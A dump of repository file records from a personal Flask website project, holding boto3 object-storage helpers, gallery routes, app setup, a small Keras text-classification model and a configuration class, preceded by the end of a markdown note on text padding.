single input, let's say 100, we might get an output like the following:\n\n1. `[\"A\", \"quick\", \"brown\", \"fox\", \"jumps\", \"over\", \"the\", \"fence\"]`\n2. `[1, 5303, 9410, 9492, 7585, 5776, 520, 3212]`\n3. 
`[ 0 0 0 0 0 0 0 0 0 0 0 0 0 0\n 0 0 0 0 0 0 0 0 0 0 0 0 0 0\n 0 0 0 0 0 0 0 0 0 0 0 0 0 0\n 0 0 0 0 0 0 0 0 0 0 0 0 0 0\n 0 0 0 0 0 0 0 0 0 0 0 0 0 0\n 0 0 0 0 0 0 0 0 0 0 0 0 0 0\n 0 0 0 0 0 0 0 0 1 5303 9410 9492 7585 5776\n 520 3212]`\n\n\n##### *To be continued...*\n" }, { "alpha_fraction": 0.6567363142967224, "alphanum_fraction": 0.6567363142967224, "avg_line_length": 25.458824157714844, "blob_id": "31cb79c6fff4627b8fffe34da266f78d8053e369", "content_id": "a4aa9aee0e9912e8cc5384df9bf3b1bf036dc322", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2249, "license_type": "no_license", "max_line_length": 100, "num_lines": 85, "path": "/austin/botoConfig/objects.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "def createBucket(client, name):\n client.create_bucket(Bucket=name)\n\n\ndef addObject(client, bucket, file, filename):\n client.put_object(ACL=\"public-read\", Body=file,\n Bucket=bucket, Key=filename, ContentType='image/jpeg')\n\n\ndef downloadObject(client, bucket, object_key, local_file):\n returned_object = client.download_file(bucket, object_key, local_file)\n return returned_object\n\n\ndef getObject(client, bucket, object_key):\n returned_object = client.get_object(Bucket=bucket, Key=object_key)\n return returned_object\n\n\ndef listObjects(client, bucket):\n objects = []\n for key in client.list_objects(Bucket=bucket)['Contents']:\n objects.append(key['Key'])\n return objects\n\n\ndef listBuckets(client):\n return client.list_buckets()\n\n\ndef objectPermissions(client, bucket, object_key):\n return client.get_object_acl(Bucket=bucket, Key=object_key)\n\n\ndef changeObjectPerm(client, bucket, object_key):\n\n ACP = {\n 'Grants': [{\n 'Grantee': {\n 'DisplayName': 'Everyone',\n 'Type': 'Group',\n },\n 'Permission': 'READ',\n }]\n }\n\n # Convert the policy to a JSON string\n # policy = json.dumps(ACP)\n\n client.put_object_acl(ACL='public-read', AccessControlPolicy=ACP, Bucket=bucket, Key=object_key)\n\n\ndef bucketPermissions(client, bucket):\n return client.get_bucket_acl(Bucket=bucket)\n\n\ndef changeBucketPermissions(resource, bucket):\n bucket_acl = resource.BucketAcl(bucket)\n bucket_acl.put(ACL=\"public-read\")\n\n\ndef getURL(client, bucket, obj_key):\n return client.generate_presigned_post(Bucket=bucket, Key=obj_key)\n\n\ndef getBucketLocation(client, bucket):\n return client.get_bucket_location(Bucket=bucket)\n\n\ndef createURL(client, bucket):\n # Create the configuration for the website\n website_configuration = {\n 'ErrorDocument': {'Key': 'error.html'},\n 'IndexDocument': {'Suffix': 'index.html'},\n 'RedirectAllRequestsTo': {\n 'HostName': 'austinbalarin.com',\n 'Protocol': 'http'\n }\n }\n\n # Set the new policy on the selected bucket\n client.put_bucket_website(\n Bucket=bucket,\n WebsiteConfiguration=website_configuration\n )\n" }, { "alpha_fraction": 0.6500530242919922, "alphanum_fraction": 0.6532343626022339, "avg_line_length": 24.486486434936523, "blob_id": "6ff4ebeb427d99f32b918dc18cc57a3b6966043b", "content_id": "d8f9797c4297ddfb0ac6b279eb71fa61bf04b912", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 943, "license_type": "no_license", "max_line_length": 84, "num_lines": 37, "path": "/austin/endpoints/gallery/routes.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "from flask import Blueprint, render_template, jsonify, request, abort\nfrom flask_login import login_required\n\nfrom 
.utils import list_albums, get_images\n\n\ngallery = Blueprint('gallery', __name__)\n\n\[email protected]('/albums', methods=['GET'])\ndef get_buckets():\n try:\n results = list_albums()\n return jsonify(results)\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n\n\[email protected]('/<album>/images', methods=['GET'])\ndef get_album(album):\n try:\n return render_template('gallery/gallery.html', links=get_images(album))\n\n except Exception as e:\n print(e)\n return abort(404)\n\n\n# @gallery.route('/create/album', methods=['GET'])\n# @login_required\n# def create_album():\n# if request.method == \"POST\":\n# return render_template('gallery/add_album.html')\n#\n# return render_template('gallery/add_album.html')\n#\n" }, { "alpha_fraction": 0.7166891098022461, "alphanum_fraction": 0.7180349826812744, "avg_line_length": 29.95833396911621, "blob_id": "f5dc17ad22b6be955413062564f52b57b337b00c", "content_id": "4ddeca576ff4f38850304c69aea5083e01199aa7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1486, "license_type": "no_license", "max_line_length": 124, "num_lines": 48, "path": "/austin/__init__.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "from flask import Flask, session\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager\n\n\nfrom austin.config import Config\nfrom austin.botoConfig.configer import getConfig\nfrom austin.botoConfig.authBoto import botoClient, botoResource\n\nconfig = getConfig(Config.APP_ROOT + '/botoConfig/config.ini')\nclient = botoClient(Config.BOTO_KEY, Config.BOTO_SECRET, config['object_api']['base_url'], config['object_api']['user'])\nresource = botoResource(Config.BOTO_KEY, Config.BOTO_SECRET, config['object_api']['base_url'], config['object_api']['user'])\n\ndb = SQLAlchemy()\nlogin_manager = LoginManager()\n\n\ndef create_app(class_config=Config):\n\n app = Flask(__name__)\n app.config.from_object(Config)\n\n @app.before_request\n def visits():\n if 'visit_count' in session:\n session['visit_count'] = session.get('visit_count') + 1\n else:\n session['visit_count'] = 1\n\n # Init app contenxts\n db.init_app(app)\n\n # Init Logi Manager\n from austin.models.user_models import load_user\n login_manager.init_app(app)\n login_manager.user_loader(load_user)\n\n from austin.endpoints.main.routes import main\n from austin.endpoints.users.routes import users\n from austin.endpoints.gallery.routes import gallery\n from austin.endpoints.machinelearning.routes import ml\n\n app.register_blueprint(main)\n app.register_blueprint(users)\n app.register_blueprint(gallery)\n app.register_blueprint(ml)\n\n return app\n" }, { "alpha_fraction": 0.692307710647583, "alphanum_fraction": 0.6951566934585571, "avg_line_length": 20.9375, "blob_id": "2560ac1719aa8c6c25942828cf0094ef2c9ff156", "content_id": "8b792e064f554f20a60224ac29dd3acf28730277", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 351, "license_type": "no_license", "max_line_length": 66, "num_lines": 16, "path": "/austin/endpoints/machinelearning/utils.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "import codecs\nimport markdown\nfrom flask import Markup\n\nfrom austin.config import Config\n\n\ndef load_md(filename):\n\n filepath = Config.APP_ROOT + \"/static/markdown/\" + filename\n input_file = codecs.open(filepath, mode=\"r\", encoding=\"utf-8\")\n text 
= input_file.read()\n\n html = markdown.markdown(text)\n html = Markup(html)\n return html\n" }, { "alpha_fraction": 0.6476345658302307, "alphanum_fraction": 0.6769983768463135, "avg_line_length": 35.05882263183594, "blob_id": "c215093a58dcf2cf79396a97119499104ad7434f", "content_id": "e6f1934feff1aad6a5f2d941ea2cec4acb89f561", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 613, "license_type": "no_license", "max_line_length": 90, "num_lines": 17, "path": "/austin/endpoints/machinelearning/urgency_model.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "import tensorflow as tf\nfrom tensorflow import keras\n\ndef urgency_model(max_vocabulary):\n model = keras.Sequential([\n keras.layers.Embedding(max_vocabulary, 32, input_length=500),\n keras.layers.Conv1D(filters=32, kernel_size=3, padding='same', activation='relu'),\n keras.layers.MaxPooling1D(pool_size=2),\n keras.layers.Flatten(),\n keras.layers.Dense(250, activation='relu'),\n keras.layers.Dropout(.025),\n keras.layers.Dense(1, activation='sigmoid')\n ])\n\n model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n return model\n" }, { "alpha_fraction": 0.6521317958831787, "alphanum_fraction": 0.6686046719551086, "avg_line_length": 26.891891479492188, "blob_id": "94d981307abdc3171ea85a475fac23d687625725", "content_id": "cde42187da4a7bcf4f3924f9257f6fd1741804a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1032, "license_type": "no_license", "max_line_length": 107, "num_lines": 37, "path": "/austin/config.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "import os\n\nimport json\nimport urllib3\nurllib3.disable_warnings()\n\nwith open(os.path.dirname(os.path.abspath(__file__)) + '/config.json') as config_file:\n config = json.load(config_file)\n\nclass Config():\n\n SECRET_KEY = os.urandom(12)\n\n # Postgres keys\n DB_USER = config.get('DB_USER')\n DB_PASS = config.get('DB_PASS')\n\n # Connection to Postgres server\n SQLALCHEMY_DATABASE_URI = 'postgresql://' + DB_USER + ':' + DB_PASS + '@45.33.79.194:5432/austinbalarin'\n\n # To suppress FSADeprecationWarning\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n\n # boto3 Keys for Object Storage\n BOTO_KEY = config.get('BOTO_KEY')\n BOTO_SECRET = config.get('BOTO_SECRET')\n\n # Github OAuth\n GITHUB_TOKEN = config.get('GITHUB_TOKEN')\n\n # Gets pwd and declares it is the root dir for the App\n APP_ROOT = os.path.dirname(os.path.abspath(__file__))\n\n # Spotify Stuff\n SPOTIFY_REDIRECT = config.get('SPOTIFY_REDIRECT')\n SPOTIFY_ID = config.get('SPOTIFY_ID')\n SPOTIFY_SECRET = config.get('SPOTIFY_SECRET')\n" } ]
18
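The PersonalSite record above ends with urgency.md, which walks through Keras one-hot hashing followed by padding, and the repo's classify() route applies exactly those two calls. As an illustration only, here is a minimal, self-contained sketch of that preprocessing, reusing the route's vocabulary size (10000) and maxlen (500); the sample sentence is the one from urgency.md, and because one_hot hashes words, the indices it prints will not match the illustrative ones in the markdown:

    from tensorflow import keras

    VOCAB_SIZE = 10000  # same value classify() passes to one_hot
    MAX_LEN = 500       # same maxlen classify() passes to pad_sequences

    text = "A quick brown fox jumps over the fence"
    # one_hot maps each word to a hashed index in [1, VOCAB_SIZE); collisions are possible.
    encoded = keras.preprocessing.text.one_hot(text, VOCAB_SIZE)
    # pad_sequences zero-pads on the left by default, producing the zero-heavy row
    # shown in urgency.md's padding example.
    padded = keras.preprocessing.sequence.pad_sequences([encoded], maxlen=MAX_LEN)
    print(padded.shape)  # (1, 500)

The left-padding default matters here: the Conv1D layer then always sees the real tokens at the end of each input, which is the standardization urgency.md describes.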
athenac7842/cs105_athena
https://github.com/athenac7842/cs105_athena
d79993924c9143ff1029aa56e87069556bad09c9
1d8bcb5c5ae477e7564cc2820c6a20d57076d4fd
a50a5bbe504db940cb9f2e7b382798583786e035
refs/heads/main
2023-07-29T11:36:22.463390
2021-09-11T21:00:26
2021-09-11T21:00:26
405,479,797
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6788389682769775, "alphanum_fraction": 0.6975655555725098, "avg_line_length": 19.901960372924805, "blob_id": "3650c43cc9bd27350cf050e01e3f50d516357ab2", "content_id": "c805eeed0f5fef6ef50ebdb78da33a84862046e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2136, "license_type": "no_license", "max_line_length": 165, "num_lines": 102, "path": "/policyanalysis.py", "repo_name": "athenac7842/cs105_athena", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# Analyze Privacy Policies\n\n# https://pypi.org/project/textstat/\n# https://colab.research.google.com/github/mohammedterry/NLP_for_ML/blob/master/Sentiment_Analysis.ipynb#scrollTo=0PWxpQSAO6x2\n# https://medium.com/@prakash507979/how-to-read-pdf-file-using-python-1e4269a5f75f\n# https://colab.research.google.com/github/computationalcore/introduction-to-python/blob/master/notebooks/4-files/PY0101EN-4-1-ReadFile.ipynb\n\n# In[ ]:\n\n\n\n\n\n# In[1]:\n\n\n#packages (do once)\nget_ipython().system('pip install textstat')\n\n\n# In[40]:\n\n\n#libraries\nimport textstat\nimport pandas as pd\nimport os\nimport glob\n\nfrom collections import Counter\n\n#sentiment analysis\nimport nltk\nnltk.download('vader_lexicon')\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nsid = SentimentIntensityAnalyzer()\n\n\n# In[81]:\n\n\n#count word frequencies\ndef wordfreq(text):\n ltext = text.lower()\n skips = [\".\", \",\",\":\", \";\", \"!\", \"?\",'\"']\n for i in skips: \n ltext = ltext.replace(i, \"\")\n\n wordfreq = Counter(ltext.split(\" \"))\n return wordfreq\n\ndef word_stats(wordfreq):\n num_unique = len(wordfreq(ppolicy))\n counts = wordfreq(ppolicy).values()\n ratio = num_unique/sum(counts)\n bullets = ppolicy.count('*')\n complexity = textstat.flesch_reading_ease(ppolicy)\n readability = textstat.text_standard(ppolicy, float_output=False)\n rtimemin = (sum(counts)/250)\n sentiment = sid.polarity_scores(ppolicy)\n \n return ratio\n #return (num_unique, sum(counts), bullets, complexity, readability, rtimemin, sentiment)\n\n\n# In[82]:\n\n\n#load files\nstats_list = []\n\nfiles = glob.glob('/Users/Athena/Desktop/privacypolicies/*.txt')\n\nfor file in files:\n with open(file, \"r\", encoding='utf8', errors = 'ignore') as f:\n ppolicy = f.read()\n stats = word_stats(wordfreq)\n stats_list.append(stats)\n stats_list.append(\"___\")\n print(file)\n\nprint(stats_list)\n \n \n\n\n# In[59]:\n\n\ntext = \"According to the Duolingo privacy policy, shares non-personal data with third party providers which can be linked back to your personal information. Privacy\"\n\n\n# In[60]:\n\n\nword_stats(wordfreq)\n\n\n# In[ ]:\n\n\n\n\n" } ]
1
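The policyanalysis.py notebook above leans on textstat and NLTK's VADER for its per-policy statistics. A minimal, self-contained check of those library calls (the sample sentence is invented purely for illustration, and the exact scores depend on the installed textstat version):

    from collections import Counter

    import nltk
    import textstat
    from nltk.sentiment.vader import SentimentIntensityAnalyzer

    nltk.download('vader_lexicon')  # one-time download of the VADER lexicon

    sample = "We collect data to improve the service. You may opt out at any time."
    freqs = Counter(sample.lower().split())

    print(len(freqs), sum(freqs.values()))                       # unique vs. total words
    print(textstat.flesch_reading_ease(sample))                  # higher score = easier text
    print(textstat.text_standard(sample, float_output=False))    # estimated grade band
    print(SentimentIntensityAnalyzer().polarity_scores(sample))  # neg/neu/pos/compound
    print(sum(freqs.values()) / 250)                             # minutes at ~250 wpm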
PatrickMcGrath29/utilities
https://github.com/PatrickMcGrath29/utilities
2373e69a48bb82347436f4b9b8425f4e8baa1bad
610e26c47556a3b2ef20582efd9be85e231a28bc
b4ba19091bb8b2fa337c7fa76cdb2b5f6af10d7b
refs/heads/master
2022-12-19T06:35:33.994058
2020-09-20T01:16:38
2020-09-20T01:16:38
296,939,572
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6907630562782288, "alphanum_fraction": 0.7148594260215759, "avg_line_length": 14.625, "blob_id": "2ebc8f7d063eb0a871d54d4dd1d2361e4a118f9e", "content_id": "6ac83547e52925a085ffa6e60502bb5b1d78ab07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 249, "license_type": "no_license", "max_line_length": 41, "num_lines": 16, "path": "/README.md", "repo_name": "PatrickMcGrath29/utilities", "src_encoding": "UTF-8", "text": "# Stella\n\n## Usage Instructions\n\n### Local Dev Setup\n\n Python Environment\n- `pyenv install 3.8.0`, if not installed\n- `pyenv virtualenv 3.8.0 stella`\n- `pyenv local stella`\n\nServerless\n- `brew install serverless`\n\n### Deploying\n- `serverless deploy`" }, { "alpha_fraction": 0.6228968501091003, "alphanum_fraction": 0.6276518106460571, "avg_line_length": 23.401784896850586, "blob_id": "62324c70fe253b1318a9a8f434c5bb3b366c80ae", "content_id": "95fdb19533327d29d75588feaea0369e6d711dfc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2734, "license_type": "no_license", "max_line_length": 89, "num_lines": 112, "path": "/stella/api.py", "repo_name": "PatrickMcGrath29/utilities", "src_encoding": "UTF-8", "text": "from __future__ import annotations\n\nimport json\nimport os\nimport secrets\nfrom datetime import datetime\n\nimport boto3\n\ndynamodb = boto3.resource('dynamodb')\n\n\ndef create(event, context):\n data = json.loads(event['body'])\n\n if 'alias' not in data or 'full_url' not in data:\n return invalid_request_response()\n\n # TODO: Handle overwriting and duplicates\n saved_alias = Alias(data['alias'], data['full_url']).save()\n return success_response(saved_alias)\n\n\ndef get(event, context):\n alias = Alias.get(event['pathParameters']['id'])\n\n if alias is None:\n return not_found_response()\n else:\n return success_response(alias)\n\n\ndef delete(event, context):\n alias = event['pathParameters']['id']\n secret_id = event['queryStringParameters'].get('secret_id')\n\n if secret_id is None:\n return invalid_request_response('A secret ID must be included.')\n\n success = Alias.delete(alias, secret_id)\n\n if success:\n return success_response({})\n else:\n return not_found_response()\n\n\ndef invalid_request_response(message=None):\n return {'statusCode': 400, 'message': message or 'Bad Request'}\n\n\ndef not_found_response():\n return {'statusCode': 404, 'message': 'Not Found'}\n\n\ndef success_response(body):\n return {'statusCode': 200, 'body': body}\n\n\nclass DynamoClient:\n def __init__(self, table_name: str):\n self.table = dynamodb.Table(table_name)\n\n def get(self, keys: dict) -> dict:\n return self.table.get_item(Key=keys)\n\n def save(self, item: dict) -> dict:\n return self.table.put_item(Item=item)\n\n def delete(self, keys: dict) -> bool:\n return self.table.delete_item(Key=keys)\n\n\nclass Alias:\n TABLE_NAME = os.environ['STELLA_DYNAMODB_TABLE']\n\n def __init__(self, alias, full_url):\n self.alias = alias\n self.full_url = full_url\n\n def serialize(self) -> dict:\n return {\n 'alias': self.alias,\n 'full_url': self.full_url\n }\n\n def save(self) -> dict:\n alias = self.serialize().update({\n 'secret_id': self.generate_secret_id(),\n 'created_date': datetime.utcnow()\n })\n DynamoClient(self.TABLE_NAME).save(alias)\n return alias\n\n @classmethod\n def get(cls, alias: str) -> dict:\n response = DynamoClient(cls.TABLE_NAME).get({'id': alias})\n return response\n # return cls(response)\n\n 
@classmethod\n def delete(cls, alias: str, secret_id: str) -> bool:\n return DynamoClient(cls.TABLE_NAME).delete({'id': alias, 'secret_id': secret_id})\n\n @staticmethod\n def generate_secret_id():\n secrets.token_urlsafe(16)\n\n\n# -- Model --\n# database operations\n# validation (serialization)\n\n" } ]
2
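The Stella api.py above routes everything through boto3's DynamoDB Table resource. For reference, a minimal sketch of the underlying calls (the table name below is a placeholder — the service actually reads os.environ['STELLA_DYNAMODB_TABLE'] — and the key attributes must match the table's key schema):

    import boto3

    # Placeholder table name; Stella resolves the real one from the environment.
    table = boto3.resource('dynamodb').Table('stella-aliases')

    # put_item writes the full record; get_item/delete_item address it by key.
    table.put_item(Item={'alias': 'gh', 'full_url': 'https://github.com'})
    item = table.get_item(Key={'alias': 'gh'}).get('Item')  # None when absent
    table.delete_item(Key={'alias': 'gh'})

get_item returns a response dict whose 'Item' key is simply missing when nothing matches, which is why the DynamoClient.get fix above unwraps it with .get('Item').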
brxx122/fastNLP
https://github.com/brxx122/fastNLP
625dbaccb37fc72aabe4612ba5c6349504418381
8affc4a3ff75061ccbdecca6247493f346634155
98a89eff1b535a83fdff144213d7d386f7d39047
refs/heads/master
2020-04-18T13:49:43.669692
2019-09-18T06:01:30
2019-09-18T06:01:30
167,572,020
0
2
Apache-2.0
2019-01-25T15:49:43
2019-09-16T07:00:36
2019-09-17T06:22:19
Python
[ { "alpha_fraction": 0.5869376063346863, "alphanum_fraction": 0.602177083492279, "avg_line_length": 38.59195327758789, "blob_id": "3509938f31c0c20c842910fe6b56e28ac2a9b4f2", "content_id": "9cab3a88bd78dc7f461d52c43800078d611750a2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6890, "license_type": "permissive", "max_line_length": 98, "num_lines": 174, "path": "/test/models/test_bert.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "import unittest\n\nimport torch\n\nfrom fastNLP.core import Vocabulary, Const\nfrom fastNLP.models.bert import BertForSequenceClassification, BertForQuestionAnswering, \\\n BertForTokenClassification, BertForMultipleChoice, BertForSentenceMatching\nfrom fastNLP.embeddings.bert_embedding import BertEmbedding\n\n\nclass TestBert(unittest.TestCase):\n def test_bert_1(self):\n vocab = Vocabulary().add_word_lst(\"this is a test .\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='test/data_for_tests/embedding/small_bert',\n include_cls_sep=True)\n\n model = BertForSequenceClassification(embed, 2)\n\n input_ids = torch.LongTensor([[1, 2, 3], [5, 6, 0]])\n\n pred = model(input_ids)\n self.assertTrue(isinstance(pred, dict))\n self.assertTrue(Const.OUTPUT in pred)\n self.assertEqual(tuple(pred[Const.OUTPUT].shape), (2, 2))\n\n pred = model(input_ids)\n self.assertTrue(isinstance(pred, dict))\n self.assertTrue(Const.OUTPUT in pred)\n self.assertEqual(tuple(pred[Const.OUTPUT].shape), (2, 2))\n\n def test_bert_1_w(self):\n vocab = Vocabulary().add_word_lst(\"this is a test .\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='test/data_for_tests/embedding/small_bert',\n include_cls_sep=False)\n\n with self.assertWarns(Warning):\n model = BertForSequenceClassification(embed, 2)\n\n input_ids = torch.LongTensor([[1, 2, 3], [5, 6, 0]])\n\n pred = model.predict(input_ids)\n self.assertTrue(isinstance(pred, dict))\n self.assertTrue(Const.OUTPUT in pred)\n self.assertEqual(tuple(pred[Const.OUTPUT].shape), (2,))\n\n def test_bert_2(self):\n\n vocab = Vocabulary().add_word_lst(\"this is a test [SEP] .\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='test/data_for_tests/embedding/small_bert',\n include_cls_sep=True)\n\n model = BertForMultipleChoice(embed, 2)\n\n input_ids = torch.LongTensor([[[2, 6, 7], [1, 6, 5]]])\n print(input_ids.size())\n\n pred = model(input_ids)\n self.assertTrue(isinstance(pred, dict))\n self.assertTrue(Const.OUTPUT in pred)\n self.assertEqual(tuple(pred[Const.OUTPUT].shape), (1, 2))\n\n def test_bert_2_w(self):\n\n vocab = Vocabulary().add_word_lst(\"this is a test [SEP] .\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='test/data_for_tests/embedding/small_bert',\n include_cls_sep=False)\n\n with self.assertWarns(Warning):\n model = BertForMultipleChoice(embed, 2)\n\n input_ids = torch.LongTensor([[[2, 6, 7], [1, 6, 5]]])\n print(input_ids.size())\n\n pred = model.predict(input_ids)\n self.assertTrue(isinstance(pred, dict))\n self.assertTrue(Const.OUTPUT in pred)\n self.assertEqual(tuple(pred[Const.OUTPUT].shape), (1,))\n\n def test_bert_3(self):\n\n vocab = Vocabulary().add_word_lst(\"this is a test [SEP] .\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='test/data_for_tests/embedding/small_bert',\n include_cls_sep=False)\n model = BertForTokenClassification(embed, 7)\n\n input_ids = torch.LongTensor([[1, 2, 3], [6, 5, 0]])\n\n pred = model(input_ids)\n self.assertTrue(isinstance(pred, dict))\n 
self.assertTrue(Const.OUTPUT in pred)\n self.assertEqual(tuple(pred[Const.OUTPUT].shape), (2, 3, 7))\n\n def test_bert_3_w(self):\n\n vocab = Vocabulary().add_word_lst(\"this is a test [SEP] .\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='test/data_for_tests/embedding/small_bert',\n include_cls_sep=True)\n\n with self.assertWarns(Warning):\n model = BertForTokenClassification(embed, 7)\n\n input_ids = torch.LongTensor([[1, 2, 3], [6, 5, 0]])\n\n pred = model.predict(input_ids)\n self.assertTrue(isinstance(pred, dict))\n self.assertTrue(Const.OUTPUT in pred)\n self.assertEqual(tuple(pred[Const.OUTPUT].shape), (2, 3))\n\n def test_bert_4(self):\n\n vocab = Vocabulary().add_word_lst(\"this is a test [SEP] .\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='test/data_for_tests/embedding/small_bert',\n include_cls_sep=True)\n model = BertForQuestionAnswering(embed)\n\n input_ids = torch.LongTensor([[1, 2, 3], [6, 5, 0]])\n\n pred = model(input_ids)\n self.assertTrue(isinstance(pred, dict))\n self.assertTrue(Const.OUTPUTS(0) in pred)\n self.assertTrue(Const.OUTPUTS(1) in pred)\n self.assertEqual(tuple(pred[Const.OUTPUTS(0)].shape), (2, 5))\n self.assertEqual(tuple(pred[Const.OUTPUTS(1)].shape), (2, 5))\n\n model = BertForQuestionAnswering(embed, 7)\n pred = model(input_ids)\n self.assertTrue(isinstance(pred, dict))\n self.assertEqual(len(pred), 7)\n\n def test_bert_4_w(self):\n\n vocab = Vocabulary().add_word_lst(\"this is a test [SEP] .\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='test/data_for_tests/embedding/small_bert',\n include_cls_sep=False)\n\n with self.assertWarns(Warning):\n model = BertForQuestionAnswering(embed)\n\n input_ids = torch.LongTensor([[1, 2, 3], [6, 5, 0]])\n\n pred = model.predict(input_ids)\n self.assertTrue(isinstance(pred, dict))\n self.assertTrue(Const.OUTPUTS(1) in pred)\n self.assertEqual(tuple(pred[Const.OUTPUTS(1)].shape), (2,))\n\n def test_bert_5(self):\n\n vocab = Vocabulary().add_word_lst(\"this is a test [SEP] .\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='test/data_for_tests/embedding/small_bert',\n include_cls_sep=True)\n model = BertForSentenceMatching(embed)\n\n input_ids = torch.LongTensor([[1, 2, 3], [6, 5, 0]])\n\n pred = model(input_ids)\n self.assertTrue(isinstance(pred, dict))\n self.assertTrue(Const.OUTPUT in pred)\n self.assertEqual(tuple(pred[Const.OUTPUT].shape), (2, 2))\n\n def test_bert_5_w(self):\n\n vocab = Vocabulary().add_word_lst(\"this is a test [SEP] .\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='test/data_for_tests/embedding/small_bert',\n include_cls_sep=False)\n\n with self.assertWarns(Warning):\n model = BertForSentenceMatching(embed)\n\n input_ids = torch.LongTensor([[1, 2, 3], [6, 5, 0]])\n\n pred = model.predict(input_ids)\n self.assertTrue(isinstance(pred, dict))\n self.assertTrue(Const.OUTPUT in pred)\n self.assertEqual(tuple(pred[Const.OUTPUT].shape), (2,))\n\n" }, { "alpha_fraction": 0.49177631735801697, "alphanum_fraction": 0.5049341917037964, "avg_line_length": 31.401254653930664, "blob_id": "5d4b273f33d81c43c25ab7e6a1b0c6ae16bad519", "content_id": "b713fc9afaf67ec0a030bbebfa17a85b2963602d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10944, "license_type": "permissive", "max_line_length": 109, "num_lines": 319, "path": "/fastNLP/io/loader/matching.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "\"\"\"undocumented\"\"\"\n\n__all__ = [\n 
\"MNLILoader\",\n \"SNLILoader\",\n \"QNLILoader\",\n \"RTELoader\",\n \"QuoraLoader\",\n]\n\nimport os\nimport warnings\nfrom typing import Union, Dict\n\nfrom .json import JsonLoader\nfrom .loader import Loader\nfrom .. import DataBundle\nfrom ...core.const import Const\nfrom ...core.dataset import DataSet\nfrom ...core.instance import Instance\n\n\nclass MNLILoader(Loader):\n \"\"\"\n 读取MNLI任务的数据,读取之后的DataSet中包含以下的内容,words0是sentence1, words1是sentence2, target是gold_label, 测试集中没\n 有target列。\n\n .. csv-table::\n :header: \"raw_words1\", \"raw_words2\", \"target\"\n\n \"The new rights are...\", \"Everyone really likes..\", \"neutral\"\n \"This site includes a...\", \"The Government Executive...\", \"contradiction\"\n \"...\", \"...\",\".\"\n\n \"\"\"\n \n def __init__(self):\n super().__init__()\n \n def _load(self, path: str):\n ds = DataSet()\n with open(path, 'r', encoding='utf-8') as f:\n f.readline() # 跳过header\n if path.endswith(\"test_matched.tsv\") or path.endswith('test_mismatched.tsv'):\n warnings.warn(\"RTE's test file has no target.\")\n for line in f:\n line = line.strip()\n if line:\n parts = line.split('\\t')\n raw_words1 = parts[8]\n raw_words2 = parts[9]\n if raw_words1 and raw_words2:\n ds.append(Instance(raw_words1=raw_words1, raw_words2=raw_words2))\n else:\n for line in f:\n line = line.strip()\n if line:\n parts = line.split('\\t')\n raw_words1 = parts[8]\n raw_words2 = parts[9]\n target = parts[-1]\n if raw_words1 and raw_words2 and target:\n ds.append(Instance(raw_words1=raw_words1, raw_words2=raw_words2, target=target))\n return ds\n \n def load(self, paths: str = None):\n \"\"\"\n\n :param str paths: 传入数据所在目录,会在该目录下寻找dev_matched.tsv, dev_mismatched.tsv, test_matched.tsv,\n test_mismatched.tsv, train.tsv文件夹\n :return: DataBundle\n \"\"\"\n if paths:\n paths = os.path.abspath(os.path.expanduser(paths))\n else:\n paths = self.download()\n if not os.path.isdir(paths):\n raise NotADirectoryError(f\"{paths} is not a valid directory.\")\n \n files = {'dev_matched': \"dev_matched.tsv\",\n \"dev_mismatched\": \"dev_mismatched.tsv\",\n \"test_matched\": \"test_matched.tsv\",\n \"test_mismatched\": \"test_mismatched.tsv\",\n \"train\": 'train.tsv'}\n \n datasets = {}\n for name, filename in files.items():\n filepath = os.path.join(paths, filename)\n if not os.path.isfile(filepath):\n if 'test' not in name:\n raise FileNotFoundError(f\"{name} not found in directory {filepath}.\")\n datasets[name] = self._load(filepath)\n \n data_bundle = DataBundle(datasets=datasets)\n \n return data_bundle\n \n def download(self):\n \"\"\"\n 如果你使用了这个数据,请引用\n\n https://www.nyu.edu/projects/bowman/multinli/paper.pdf\n :return:\n \"\"\"\n output_dir = self._get_dataset_path('mnli')\n return output_dir\n\n\nclass SNLILoader(JsonLoader):\n \"\"\"\n 读取之后的DataSet中的field情况为\n\n .. 
